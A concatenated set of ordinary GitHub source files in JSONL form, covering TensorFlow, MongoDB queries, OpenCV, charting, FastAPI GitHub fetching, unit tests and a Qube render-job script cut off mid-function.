y_test)\r\n\r\n# # print(sentences_test)\r\n\r\n# # test_string = [\"deprimido agobiado ansioso ansiedad triste sufriendo cuarentena ayuda\"]\r\n# test_string = [\"si\"]\r\n# # vectorize\r\n# test_string = vectorizer.transform(test_string)\r\n\r\n# score2 = classifier.predict(test_string)\r\n\r\n# print(\"Test Acc: \", score2)\r\n\r\n# print(\"Accuracy:\", score)\r\n\r\n\r\n# window.title(\"App\")\r\n\r\n# window.geometry('570x200')\r\n\r\n# # labels\r\n# Label(window, text=\"Inserte un texto para analizar: \").grid(row=0, sticky=W)\r\n\r\n# # text input\r\n# txt = scrolledtext.ScrolledText(window,width=45,height=3)\r\n# txt.grid(column=1,row=0)\r\n\r\n# Button(window, text =\"Test Microblog\", command = test_string).grid(row=1)","repo_name":"Josrodjr/proyecto_graduacion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4290035562","text":"#!/usr/bin/env python3\nfrom pprint import pprint\n\nimport tensorflow as tf\n\nfrom src.domains.flattened_hunger_games.flattened_hunger_games_as_numpy_values import infoset_acting_players\nfrom src.utils.tf_utils import print_tensors\n\naction_counts = [\n\t[2],\n\t[1, 6],\n\t[4, 0, 0, 0, 0, 0, 0],\n\t[3, 3, 2, 2],\n\t[2] * 10,\n\t[0] * 20,\n]\nnode_to_infoset = [\n\t[0],\n\t[0, 1],\n\t[0, 1, 1, 1, 1, 1, 1], # `1` for the infoset of terminal nodes\n\t[0, 0, 1, 1],\n\t[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n]\nsection_delimiter = \"##############################\"\nmask_of_inner_nodes = [\n\ttf.not_equal(\n\t\taction_count,\n\t\t0,\n\t\tname=\"mask_of_inner_nodes_lvl{}\".format(level)\n\t)\n\tfor level, action_count in enumerate(action_counts)\n]\ninner_node_to_infoset = [\n\ttf.expand_dims(\n\t\ttf.boolean_mask(\n\t\t\tnode_to_infoset_level,\n\t\t\tmask=mask_of_inner_nodes[level]\n\t\t),\n\t\taxis=-1,\n\t\tname=\"inner_node_to_infoset_lvl{}\".format(level),\n\t)\n\tfor level, node_to_infoset_level in enumerate(node_to_infoset)\n]\naction_counts_of_inner_nodes = [\n\ttf.boolean_mask(\n\t\taction_count,\n\t\tmask=mask_of_inner_nodes[level],\n\t\tname=\"action_counts_of_inner_nodes_lvl{}\".format(level)\n\t)\n\tfor level, action_count in enumerate(action_counts)\n]\ninfoset_action_counts = [\n\ttf.scatter_nd_update(\n\t\tref=tf.Variable(\n\t\t\ttf.zeros_like(\n\t\t\t\tinfoset_acting_players[level]\n\t\t\t)\n\t\t),\n\t\tindices=inner_node_to_infoset[level],\n\t\tupdates=action_counts_of_inner_nodes[level],\n\t\tname=\"infoset_action_counts_lvl{}\".format(level),\n\t)\n\tfor level in range(len(infoset_acting_players))\n]\n\n\nif __name__ == '__main__':\n\tprint(\"action_counts:\")\n\tpprint(action_counts, indent=1, width=80)\n\tprint(\"node_to_infoset:\")\n\tpprint(node_to_infoset, indent=1, width=80)\n\tprint(\"infoset_acting_players:\")\n\tpprint(infoset_acting_players, indent=1, width=40)\n\tprint(section_delimiter)\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer())\n\n\t\tfor level in range(len(infoset_acting_players)):\n\t\t\tprint(\"########## Level {} ##########\".format(level))\n\t\t\tprint_tensors(sess, [\n\t\t\t\tmask_of_inner_nodes[level],\n\t\t\t\tinner_node_to_infoset[level],\n\t\t\t\taction_counts_of_inner_nodes[level],\n\t\t\t\ttf.shape(\n\t\t\t\t\tinfoset_acting_players[level],\n\t\t\t\t\tname=\"infoset_acting_players_lvl{}\".format(level)\n\t\t\t\t),\n\t\t\t\tinfoset_action_counts[level]\n\t\t\t])\n\t\t\tprint(section_delimiter)\n\t\tprint(\"Check for multiple calls of 
`scatter_nd_update`\")\n\t\tprint(section_delimiter)\n\t\tprint_tensors(sess, infoset_action_counts)\n\t\tprint(section_delimiter)\n\t\tprint_tensors(sess, infoset_action_counts)\n\t\tprint(section_delimiter)\n\t\tprint_tensors(sess, infoset_action_counts)\n","repo_name":"aicenter/TensorCFR","sub_path":"src/showcases/tf_scatter_nd_update.py","file_name":"tf_scatter_nd_update.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"4978070240","text":"from datetime import datetime, timezone\r\nimport random\r\nimport string\r\nfrom bson import regex\r\n############################CREATE: addArticle()#############################\r\ndef create_article_id():\r\n id_1 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 8))\r\n id_2 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 4))\r\n id_3 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 4))\r\n id_4 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 4))\r\n id_5 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 12))\r\n return \"nyt://article/\"+id_1+\"-\"+id_2+\"-\"+id_3+\"-\"+id_4+\"-\"+id_5\r\n\r\ndef create_keywords(kw_list):\r\n keywords = []\r\n for i in range(len(kw_list)-1):\r\n temp_dict = {}\r\n temp_list = kw_list[i].split(',')\r\n temp_dict[\"name\"] = temp_list[0]\r\n temp_dict[\"value\"] = temp_list[1]\r\n temp_dict[\"rank\"] = int(temp_list[2])\r\n temp_dict[\"major\"] = \"N\"\r\n keywords.append(temp_dict)\r\n return keywords\r\n\r\ndef create_byline(first, middle, last,rank):\r\n full_name = \"\"\r\n if middle == \"\":\r\n full_name = \"By \"+first+\" \"+last\r\n byline = {'original':full_name,'person':[{'firstname':first,'middlename':None,'lastname':last,'rank':rank}]}\r\n else:\r\n full_name = \"By \"+first+\" \"+middle+\" \"+last\r\n byline = {'original':full_name,'person':[{'firstname':first,'middlename':middle,'lastname':last,'rank':rank}]}\r\n return byline\r\n\r\ndef addArticle():\r\n article_id = create_article_id()\r\n pub_date = str(datetime.now().astimezone(timezone.utc).isoformat(timespec='seconds'))\r\n web_url = input(\"URL:\\t\")\r\n abstract = input(\"Abstract:\\t\")\r\n headline = input(\"Headline:\\t\")\r\n\r\n print(\"Person\")\r\n first_name = input(\"\\tFirst name:\\t\")\r\n middle_name = input(\"\\tMiddle name:\\t\")\r\n last_name = input(\"\\tLast name:\\t\")\r\n rank = input(\"\\tRank:\\t\")\r\n byline = create_byline(first_name,middle_name,last_name,rank)\r\n\r\n print(\"\\nPossible name choices: [subject, persons, organizations, glocations]\")\r\n print(\"Keywords (name,value,rank) -- press d when done\")\r\n kw_list=[]\r\n keyword = \"\"\r\n while keyword != \"d\":\r\n keyword = input(\"\\t\")\r\n kw_list.append(keyword)\r\n keywords = create_keywords(kw_list)\r\n\r\n word_count = int(input(\"Word count:\\t\"))\r\n \r\n print(\"\\n[Op-Ed, News, Letter, Schedule, Brief, Editorial, Review, Correction, Obituary (Obit), Slideshow]\")\r\n type_of_material = input(\"Type of material:\\t\")\r\n \r\n print(\"\\n[New York, Sports, Opinion, Business Day, Technology, Science, World, U.S., Arts, Opinion, World, Books, Crosswords & Games, Education, Health, Theater, Food]\")\r\n section_name = input(\"Section name:\\t\")\r\n \r\n print(\"\\n[College Football, Media, World Business, Middle East, Pro Basketball, Music, Art & Design, Asia Pacific, Americas, Europe, Hockey, Bridge, Africa, Asia, Australia, Televsion]\")\r\n 
subsection_name = input(\"Subsection name:\\t\")\r\n \r\n print(\"\\n[Metro, Sports, Letters, Business, National, Foreign, Editorial, Culture, ContinuousNews, OpEd, Summary, Science, New York, Finance, Magazine, Real Estate, Education, Dining]\")\r\n news_desk = input('News desk:\\t')\r\n\r\n source = input(\"Source:\\t\")\r\n\r\n article_doc = {'abstract':abstract,'web_url':web_url,'source':source,\r\n 'headline':{'main':headline,'kicker': None, 'content_kicker': None, \r\n 'print_headline': '', 'name': None, 'seo': None, 'sub': None},'keywords':keywords,\r\n 'pub_date':pub_date,'document_type':'article','news_desk':news_desk,\r\n 'section_name':section_name,'subsection_name': subsection_name, 'byline':byline,'type_of_material':type_of_material,\r\n '_id':article_id,'word_count':word_count,'uri':article_id, 'read_count':0}\r\n return article_doc\r\n######################RETRIEVE: findArticlesWKeyValueRank()######################\r\ndef findArticlesWKeyValueRank():\r\n value = input('Keyword value:\\t')\r\n rank = input('Rank:\\t')\r\n return {'value':value, 'rank':{'$gte':int(rank)}}\r\n######################RETRIEVE: findArticlesNWordCount()######################\r\ndef findArticlesNWordCount():\r\n word_count = int(input('Find articles with a word count >=:\\t'))\r\n return word_count\r\n######################RETRIEVE: getTotalWordCountSubsectionName()######################\r\ndef getTotalWordCountSubsectionName():\r\n print('Choose a section: [Fashion, Parenting, Video, Travel, New York, Sports, Opinion, Business Day, Technology, Science, World, U.S., Arts, Opinion, World, Books, Homepage, College, Movies, Education, Health, Theater, Food]')\r\n section_name = input('Section name:\\t')\r\n query=[\r\n {'$match': {'section_name': section_name}},\r\n\t {'$group': {'_id': '$subsection_name', 'total': {'$sum':'$word_count'}}},\r\n\t {'$sort': {'total':-1}}\r\n ]\r\n return query\r\n######################RETRIEVE: readAbstractBasedOnKeywordValueExpr()######################\r\ndef readAbstractBasedOnKeywordValue():\r\n expr = input('Enter a keyword value expression (case sensitive):\\t')\r\n query = {'keywords.value':{'$regex':f\"{expr}\"}}\r\n return query\r\n######################RETRIEVE: findArticlesFromDate()######################\r\n\"\"\"\r\nFind articles from a certain date\r\n Return the input which is date of article need to be find\r\n\"\"\"\r\ndef findArticlesFromDate():\r\n user_input = input('Selection: Find article from date (in YYYY/MM/DD HH/MM/SS) \\n')\r\n return user_input\r\n######################RETRIEVE: findOtherArticlesByPerson()######################\r\n\"\"\"\r\nFind articles by person by firstname + lastname \r\n Return the query by $elemMatch which use input are fistname and lastname of the author.\r\n\"\"\"\r\ndef findOtherArticlesByPerson():\r\n firstname = input('Input the first name of the author: \\n')\r\n lastname = input('Input the last name of the author')\r\n query = {'person':{'$elemMatch': {'firstname':firstname,'lastname': lastname}}} \r\n return query\r\n######################RETRIEVE: getTypeOfMaterialAndMultimedia()######################\r\n\"\"\"\r\nFind article by getting type of the material and multimedia\r\n Return query which use $exists to check for existing field, search by type of material\r\n\"\"\"\r\ndef getTypeOfMaterialAndMultimedia():\r\n input1 = input('Type of Material: \\n')\r\n query = {'type_of_material': input1, 'multimedia': {'$exists': True}}\r\n return query\r\n######################RETRIEVE: 
getArticle()######################\r\ndef getArticle():\r\n url = input('URL:\\t')\r\n query = {'web_url': url}\r\n return query\r\n\r\n######################UPDATE: updateReadCountForArticle()######################\r\ndef updateReadCountForArticle():\r\n inc_read = {'$inc':{'read_count':1}}\r\n return inc_read\r\n######################UPDATE: addCommentsToArticle()######################\r\ndef addCommentsToArticle():\r\n num_comments = int(input('How many comments will you add:\\t'))\r\n comments_list = []\r\n for i in range(num_comments):\r\n comment_info = {}\r\n comment_info['userDisplayName'] = input('\\tUser Display Name:\\t')\r\n comment_info['commentBody'] = input('\\tComment Body:\\t')\r\n comment_info['recommendations'] = int(input('\\tNumber of recommendations(integer):\\t'))\r\n comments_list.append(comment_info)\r\n query = {'$set':{'comments': comments_list}}\r\n return query\r\n######################DELETE: deleteManyArticlesWithSectionKeywordVal()######################\r\ndef deleteManyArticlesWithSectionKeywordVal():\r\n print('Sections: [Fashion, Parenting, Video, Travel, New York, Sports, Opinion, Business Day, Technology, Science, World, U.S., Arts, Opinion, World, Books, Homepage, College, Movies, Education, Health, Theater, Food]')\r\n section_name = input(\"Delete articles with section name:\\t\")\r\n kw_value = input(\"with keyword value:\\t\")\r\n query = {'section_name':section_name,'keywords': {'$elemMatch':{'value':kw_value}}}\r\n return query\r\n######################DELETE: deleteArticleWordReadCount()######################\r\ndef deleteArticleWordReadCount():\r\n wc = int(input('\\tDelete article where word count is less than (integer):\\t'))\r\n rc = int(input('\\tDelete article where read count is less than (integer):\\t'))\r\n query = {'word_count': {'$lt': wc}, 'read_count': {'$lt': rc}}\r\n return query\r\n######################UPDATE: addKeywordArticle()######################\r\ndef addKeywordArticle():\r\n new_kw = {}\r\n new_kw['name'] = input('Name of keyword [persons, subject, organizations]:\\t')\r\n new_kw['value'] = input('Keyword value:\\t')\r\n new_kw['rank'] = int(input('Rank of keyword(integer):\\t'))\r\n query = {'$push': {'keywords': new_kw}}\r\n return query\r\n######################RETRIEVE: getNMostPopularKeywords()######################\r\ndef getNMostPopularKeywords():\r\n top_n_kw = int(input('Get top __ keywords for articles:\\t'))\r\n query = {'keywords.value': {'$slice':top_n_kw}, 'web_url':1,'headline.main':1,'_id':0}\r\n return query\r\n######################RETRIEVE: getArticlesInSections()######################\r\ndef getArticlesInSections():\r\n print('Sections: [Fashion, Parenting, Video, Travel, New York, Sports, Opinion, Business Day, Technology, Science, World, U.S., Arts, Opinion, World, Books, Homepage, College, Movies, Education, Health, Theater, Food]')\r\n section_choices = []\r\n choice = \"\"\r\n print(\"Enter the sections as they appear. 
Press \\'d\\' when done.\")\r\n while choice != \"d\":\r\n choice = input(\"\\tSection:\\t\")\r\n section_choices.append(choice)\r\n return section_choices[:-1]\r\n######################DELETE: deleteOneArticle()######################\r\nif __name__ == \"__main__\": \r\n print(__name__)","repo_name":"giangduong96/NoSQl-MongoDB","sub_path":"UseCases.py","file_name":"UseCases.py","file_ext":"py","file_size_in_byte":9708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25078476613","text":"'''Problema 4:\n\nDado el siguiente listado:\n\nnotas = [(5, 5, 10, \"Regular\"), (10, 2, 4, \"Bueno\"), (10, 1, 9, \"Muy Bueno\"), (7, 2, 3, \"Sobresaliente\")]\n\nFiltrar aquellos que tiene la calificación cualitativa \"Regular o Bueno\"\n\n\n'''\n\n#Notas en estado numerico y cualitativo\nnotas = [(5, 5, 10, \"Regular\"), (10, 2, 4, \"Bueno\"), (10, 1, 9, \"Muy Bueno\"), (7, 2, 3, \"Sobresaliente\")]\n#Funcion lambda y filter que filtra el emncuentro de notas cua;itativas\n\nmiFuncion = filter( lambda x: x[3] == \"Regular\" or x[3]== \"Bueno\" , notas)\n#iMPRESION DE RESULTADOS\n\nprint(list(miFuncion))","repo_name":"ProgFuncionalReactivaoct19-feb20/laboratorio1-clase03-Shomira","sub_path":"problema4.py","file_name":"problema4.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40163205746","text":"import requests\r\nfrom fastapi import FastAPI, HTTPException\r\nfrom user_data import UserData\r\nfrom repository import Repository\r\n\r\napp = FastAPI()\r\n\r\n\r\ndef fetching_failed_exception(status_code: int):\r\n return HTTPException(\r\n status_code=status_code,\r\n detail=f'Code executed with status {status_code}. 
Fetching failed.')\r\n\r\n\r\ndef fetch_user_data(login, token):\r\n\r\n if token is None or token == '':\r\n headers = {'Authorization': ''}\r\n else:\r\n headers = {'Authorization': 'token ' + token}\r\n\r\n url_user = 'https://api.github.com/users/' + login\r\n\r\n url_repos = 'https://api.github.com/users/' + login + '/repos'\r\n\r\n name = None\r\n bio = None\r\n\r\n response_user = requests.get(url=url_user, headers=headers)\r\n\r\n if response_user.status_code == 200:\r\n data = response_user.json()\r\n name = data['name']\r\n bio = data['bio']\r\n elif response_user.status_code == 404:\r\n raise HTTPException(status_code=404, detail='User Not Found')\r\n else:\r\n raise fetching_failed_exception(response_user.status_code)\r\n\r\n response_repos = requests.get(url=url_repos, headers=headers)\r\n\r\n if response_repos.status_code == 200:\r\n data = response_repos.json()\r\n repositories = []\r\n for repo in data:\r\n repo_languages = requests.get(url=repo['languages_url'], headers=headers)\r\n if repo_languages.status_code == 200:\r\n repo_languages = repo_languages.json()\r\n else:\r\n raise fetching_failed_exception(repo_languages.status_code)\r\n repository = Repository(repo['name'], repo_languages)\r\n repositories.append(repository)\r\n return UserData(login, name, bio, repositories)\r\n elif response_repos.status_code == 404:\r\n raise HTTPException(status_code=404, detail='Repository Not Found')\r\n else:\r\n raise fetching_failed_exception(response_repos.status_code)\r\n\r\n\r\n@app.get('/user_info', status_code=200)\r\nasync def get_user_info(login: str = '', token: str | None = None):\r\n user_data = fetch_user_data(login, token)\r\n user_info = {\r\n 'login': user_data.user_login,\r\n 'name': user_data.user_name,\r\n 'bio': user_data.user_bio,\r\n 'languages_used': []\r\n }\r\n languages_info = user_data.get_all_language_stats()\r\n for lang_name, size_bytes in languages_info.items():\r\n user_info['languages_used'].append(\r\n {'language_name': lang_name,\r\n 'size_bytes': size_bytes})\r\n return user_info\r\n\r\n\r\n@app.get('/repositories_info', status_code=200)\r\nasync def get_repositories_info(login: str = '', token: str | None = None):\r\n user_data = fetch_user_data(login, token)\r\n repositories = {\r\n 'login': login,\r\n 'repositories': []\r\n }\r\n for repos in user_data.user_repositories:\r\n repo = {\r\n 'repository_name': repos.repository_name,\r\n 'languages': []\r\n }\r\n for lang_name, size_bytes in repos.repository_languages.items():\r\n lang_info = {\r\n 'language_name': lang_name,\r\n 'size_bytes': size_bytes\r\n }\r\n repo['languages'].append(lang_info)\r\n repositories['repositories'].append(repo)\r\n return repositories\r\n","repo_name":"lukaszwelnic/allegro-summer-experience-2022","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38365470614","text":"from typing import Tuple\n\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as pd\n\nfrom qf_lib.common.utils.dateutils.get_values_common_dates import get_values_for_common_dates\nfrom qf_lib.common.utils.returns.beta_and_alpha import beta_and_alpha_full_stats\nfrom qf_lib.containers.series.qf_series import QFSeries\nfrom qf_lib.plotting.charts.chart import Chart\nfrom qf_lib.plotting.decorators.axes_formatter_decorator import PercentageFormatter\n\n\nclass RegressionChart(Chart):\n \"\"\"\n Creates a regression chart.\n\n Parameters\n -----------\n 
benchmark_tms: QFSeries\n timeseries of the benchmark\n strategy_tms: QFSeries\n timeseries of the strategy\n tail_plot: bool\n plot tail data\n custom_title: bool\n add custom title to the plot\n \"\"\"\n def __init__(self, benchmark_tms: QFSeries, strategy_tms: QFSeries, tail_plot=False, custom_title=False):\n super().__init__()\n self.assert_is_qfseries(benchmark_tms)\n self.assert_is_qfseries(strategy_tms)\n\n self.benchmark_tms = benchmark_tms.to_simple_returns()\n self.strategy_tms = strategy_tms.to_simple_returns()\n self.tail_plot = tail_plot\n self.custom_title = custom_title\n\n def plot(self, figsize: Tuple[float, float] = None):\n self._setup_axes_if_necessary(figsize)\n self._apply_decorators()\n\n datapoints_tms, regression_line, beta, alpha, r_squared, max_ret = self._prepare_data_to_plot()\n self._plot_data(datapoints_tms, regression_line, beta, alpha, r_squared, max_ret)\n\n if self.tail_plot:\n _, regression_line, beta, alpha, r_squared, max_ret = self._prepare_data_to_plot(tail=True)\n self._plot_tail_data(regression_line, beta, alpha, r_squared, max_ret)\n\n self.axes.set_xlabel(self.benchmark_tms.name)\n self.axes.set_ylabel(self.strategy_tms.name)\n if self.custom_title is not False and isinstance(self.custom_title, str):\n self.axes.set_title(self.custom_title)\n else:\n self.axes.set_title('Linear Regression')\n\n def _prepare_data_to_plot(self, tail=False):\n strategy_rets = self.strategy_tms.to_simple_returns()\n benchmark_rets = self.benchmark_tms.to_simple_returns()\n\n strategy_rets, benchmark_rets = get_values_for_common_dates(strategy_rets, benchmark_rets)\n datapoints_tms = pd.concat((benchmark_rets, strategy_rets), axis=1)\n\n if tail:\n def get_tail_indices():\n avg_rets = strategy_rets.mean()\n std_rets = strategy_rets.std()\n # Tail events are < the avg portfolio returns minus one std\n return strategy_rets < avg_rets - std_rets\n\n tail_indices = get_tail_indices()\n strategy_tail_returns = strategy_rets.loc[tail_indices]\n\n beta, alpha, r_value, p_value, std_err = beta_and_alpha_full_stats(\n strategy_tms=strategy_tail_returns, benchmark_tms=benchmark_rets)\n else:\n beta, alpha, r_value, p_value, std_err = beta_and_alpha_full_stats(\n strategy_tms=strategy_rets, benchmark_tms=benchmark_rets)\n\n max_ret = datapoints_tms.abs().max().max() # take max element from the whole data-frame\n x = np.linspace(-max_ret, max_ret, 20)\n y = beta * x + alpha\n regression_line = QFSeries(data=y, index=pd.Float64Index(x))\n\n return datapoints_tms, regression_line, beta, alpha, r_value ** 2, max_ret\n\n def _plot_data(self, datapoints_tms, regression_line, beta, alpha, r_squared, max_ret):\n colors = Chart.get_axes_colors()\n\n self.axes.scatter(x=datapoints_tms.iloc[:, 0], y=datapoints_tms.iloc[:, 1],\n c=colors[0], alpha=0.6, edgecolors='black', linewidths=0.5)\n\n self.axes.axhline(0, color='black', axes=self.axes, linewidth=1)\n self.axes.axvline(0, color='black', axes=self.axes, linewidth=1)\n\n self.axes.plot(regression_line.index.values, regression_line.values, axes=self.axes, color=colors[1])\n\n self.axes.set_xlim([-max_ret, max_ret])\n self.axes.set_ylim([-max_ret, max_ret])\n\n props = dict(boxstyle='square', facecolor='white', alpha=0.5)\n textstr = '$\\\\beta={0:.2f}$\\n$\\\\alpha={1:.2%}$$\\%$\\n$R^2={2:.2}$'.format(beta, alpha, r_squared)\n font_size = mpl.rcParams['legend.fontsize']\n\n self.axes.text(\n 0.05, 0.95, textstr, transform=self.axes.transAxes, bbox=props, verticalalignment='top', fontsize=font_size)\n\n 
self.axes.xaxis.set_major_formatter(PercentageFormatter())\n self.axes.yaxis.set_major_formatter(PercentageFormatter())\n\n def _plot_tail_data(self, regression_line, beta, alpha, r_squared, max_ret):\n colors = Chart.get_axes_colors()\n\n self.axes.plot(regression_line.index.values, regression_line.values, axes=self.axes, color=colors[2])\n\n self.axes.set_xlim([-max_ret, max_ret])\n self.axes.set_ylim([-max_ret, max_ret])\n\n props = dict(boxstyle='square', facecolor=colors[2], alpha=0.5)\n textstr = 'tail $\\\\beta={0:.2f}$\\ntail $\\\\alpha={1:.2%}$$\\%$\\ntail $R^2={2:.2}$'.format(beta, alpha, r_squared)\n font_size = mpl.rcParams['legend.fontsize']\n\n self.axes.text(\n 0.80, 0.35, textstr, transform=self.axes.transAxes, bbox=props, verticalalignment='top', fontsize=font_size)\n","repo_name":"quarkfin/qf-lib","sub_path":"qf_lib/plotting/charts/regression_chart.py","file_name":"regression_chart.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":396,"dataset":"github-code","pt":"77"} +{"seq_id":"25758567721","text":"import cv2 as cv\r\nimport numpy as np\r\n\r\n\r\ndef create_image():\r\n img = np.zeros([400, 400, 3], np.uint8)\r\n img[: , : , 0] = np.ones([400, 400]) * 255\r\n cv.imshow(\"test\", img)\r\n\r\n\r\ndef alter_pixels(image):\r\n print(image.shape)\r\n height, width, channels = image.shape[0], image.shape[1], image.shape[2]\r\n for row in range(height):\r\n for col in range(width):\r\n for c in range(channels):\r\n pixel = image[row, col, c]\r\n image[row, col, c] = 255 - pixel\r\n cv.imshow('alterred', image)\r\n \r\n\r\nprint (\"Hello OpenCV\")\r\n\r\nimage_add = 'images/nice_bra.jpg'\r\n\r\nsrc = cv.imread(image_add)\r\ncv.namedWindow(\"input image\", cv.WINDOW_AUTOSIZE)\r\ncv.imshow(\"input image\", src)\r\ncreate_image()\r\nalter_pixels(src)\r\ncv.waitKey(0)\r\ncv.destroyAllWindows()","repo_name":"gbZachYin/OpenCV","sub_path":"2-numpy.py","file_name":"2-numpy.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30343489805","text":"from typing import Any, Dict\n\nimport pytest\nfrom robotcode.core.dataclasses import TypeValidationError, as_dict, from_dict\nfrom robotcode.robot.config.model import RobotConfig\n\n\n@pytest.mark.parametrize(\n (\"kwargs\"),\n [\n ({\"args\": 1}),\n ({\"python_path\": 1}),\n ({\"env\": 1}),\n ({\"output_dir\": 1}),\n ({\"args\": 1, \"output_dir\": 1}),\n ],\n)\ndef test_robot_config_cannot_assign_invalid_args(kwargs: Dict[str, Any]) -> None:\n with pytest.raises(TypeValidationError):\n RobotConfig(**kwargs)\n\n\ndef test_robot_config_can_created_from_dict() -> None:\n data: Dict[str, Any] = {\n \"args\": [\"--argument\"],\n \"python-path\": [\"asd\"],\n \"env\": {},\n \"variables\": {\"a\": \"1\"},\n \"variable-files\": [],\n \"paths\": [],\n \"console\": None,\n \"output-dir\": None,\n \"output\": None,\n \"log\": None,\n \"debug-file\": None,\n \"log-level\": None,\n \"languages\": [],\n \"pre-run-modifiers\": {},\n \"pre-rebot-modifiers\": {},\n \"listeners\": {},\n \"rpa\": True,\n }\n model = from_dict(data, RobotConfig)\n model_dict = as_dict(model)\n for key in data:\n assert model_dict[key] == data[key], key\n","repo_name":"d-biehl/robotcode","sub_path":"tests/robotcode/robot/config/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"77"} 
+{"seq_id":"19314530262","text":"from modules.npsb_read import npsb_read\nfrom modules.recon import recon\nfrom modules.converter import converter\n\nclass ia_maker:\n def __init__(self, proc, s_path):\n self.switchread = npsb_read(s_path)\n self.recon = recon()\n dlo = proc.DLO\n self.converter = converter()\n self.swframe = self.switchread.switchFrame\n self.bdframe = self.converter.convert(dlo, proc, self.recon)\n\n B_PAN = self.bdframe\n B_PAN['IA Status'] = B_PAN['PAN'].str.contains('462870|526238')\n self.B_PAN_issuing = B_PAN[B_PAN['IA Status'] == True]\n self.B_PAN_accuring = B_PAN[B_PAN['IA Status'] == False]\n\n S_PAN = self.swframe\n S_PAN['IA Status'] = S_PAN['PAN'].str.contains('462870|526238')\n self.S_PAN_issuing = S_PAN[S_PAN['IA Status'] == True]\n self.S_PAN_accuring = S_PAN[S_PAN['IA Status'] == False]\n","repo_name":"shanewas/npsb-recon","sub_path":"modules/issue_accuring_maker.py","file_name":"issue_accuring_maker.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17068657292","text":"import unittest\nimport os\n\n# Add parent dir to path to import utils\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),\n '..')))\nfrom test_cases import utils\n\n\nclass CRMTask(unittest.TestCase):\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def setUp(self):\n data = {\n 'status': 'API Test Task Name',\n 'priority': 'High'\n }\n self.obj = self.account.crm_tasks.create(data=data)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def tearDown(self):\n self.obj.delete()\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_list_object(self):\n objects = self.account.crm_tasks.all()\n # assert properties\n if objects:\n obj = objects[0]\n self.assertEqual(obj.type, 'Task')\n self.assertTrue('raw' in obj)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_read_object(self):\n obj = self.account.crm_tasks.retrieve(self.obj.id)\n # assert Task properties\n self.assertEqual(obj.id, self.obj.id)\n self.assertEqual(obj.type, 'Task')\n self.assertTrue('raw' in obj)\n\n self.assertTrue('created' in obj)\n self.assertTrue('modified' in obj)\n self.assertTrue('description' in obj)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_update_object(self):\n obj = self.obj\n obj.description = 'test task description'\n obj.save()\n self.assertEqual('test task description', obj.description)\n\n\ndef test_cases():\n return [utils.create_test_case(acc, CRMTask) for acc in utils.accounts]\n\nif __name__ == '__main__':\n suite = utils.create_suite(test_cases())\n unittest.TextTestRunner(verbosity=2).run(suite)\n","repo_name":"amir17688/google_data_p2","sub_path":"82338_test_task.py_C__Users_user_Desktop_data_2_data_google_data_Kloudless_kloudl.py","file_name":"82338_test_task.py_C__Users_user_Desktop_data_2_data_google_data_Kloudless_kloudl.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1790433689","text":"#!/usr/bin/env python\n# Below are required imports for the script to run\nimport os, sys\n# The next few lines attempt to import the Qube API. 
If the path to the qb module\n# is not in $PATH or $PYTHONPATH, we will attempt to find it by looking in known\n# locations \nimport sys\nsys.path.insert(0,\"/usr/local/pfx/qube/api/python/\")\nimport qb\n \n# Below is the main function to run in this script\ndef main():\n    \n    # Below creates an empty dictionary to be filled by the following lines of code\n    job = {}\n    \n    # Below defines the name of the Qube! job. This is the name that will be\n    # displayed in the GUI and through the command line tools\n    job['name'] = 'Prman Test'\n    # Below defines how many Instances/subjobs the job is to spawn. Because we\n    # will be running only a single command, there is no need to request more than 1. \n    job['cpus'] = 1\n    \n    # Below defines the internal Qube! jobtype to be used to execute the job.\n    # 'cmdline' tells Qube that on the backend, we will execute a single command line\n    # command. This will be the same as opening a terminal/command prompt and typing\n    # out a command.\n    job['prototype'] = 'cmdline'\n    job['env']={\n        \"RMANTREE\":\"/opt/software/pixar/RenderManProServer-24.1/\",\n        \"LD_LIBRARY_PATH\":\"/usr/lib:/usr/lib64:/opt/software/pixar/RenderManProServer-24.1/lib\",\n        \"PATH\":\"/opt/software/pixar/RenderManProServer-24.1/bin:/opt/software/autodesk/maya/bin:/usr/bin\",\n        \"MAYA_LOCATION\":\"/opt/software/autodesk/maya/\"}\n    \n    # The below parameters are explained further in the \"Job submission with job\n    # package explained\" page\n    package = {}\n    package['cmdline'] = 'ls -al /opt/software/autodesk/arnold' #'Render TestMaya.ma'\n\n    job['package'] = package\n    \n    # Below creates an empty list to be filled by the following lines of code.\n    listOfJobsToSubmit = []\n    \n   